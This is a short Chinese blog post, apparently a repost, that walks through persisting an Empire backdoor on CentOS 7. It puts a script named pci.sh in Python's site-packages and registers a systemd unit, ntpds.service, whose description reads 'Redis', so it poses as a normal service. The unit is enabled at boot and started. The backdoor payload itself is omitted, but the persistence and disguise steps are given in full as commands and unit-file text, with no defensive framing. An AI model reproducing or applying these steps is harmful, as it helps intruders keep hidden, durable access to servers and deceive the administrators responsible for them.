centos7下面利用服务启动empire后门的方法

//centos7下面利用服务启动empire后门的方法：

vi /usr/lib/python2.7/site-packages/pci.sh //放入empire后门
chmod 755 /usr/lib/python2.7/site-packages/pci.sh
cd /usr/lib/systemd/system
vi ntpds.service
chmod 755 ntpds.service
systemctl enable ntpds.service //设置开机启动
systemctl start ntpds.service
systemctl status ntpds.service

//pci.sh是empire后门代码：
#!/bin/sh
python后门代码略

//ntpds.service启动文件
[Unit]
Description=Redis
After=network.target remote-fs.target nss-lookup.target
 
[Service]
Type=forking
ExecStart=/usr/lib/python2.7/site-packages/pci.sh
ExecStop=
 
[Install]
WantedBy=multi-user.target

empire后门上线了：

原文：https://www.cnblogs.com/pt007/p/12165593.html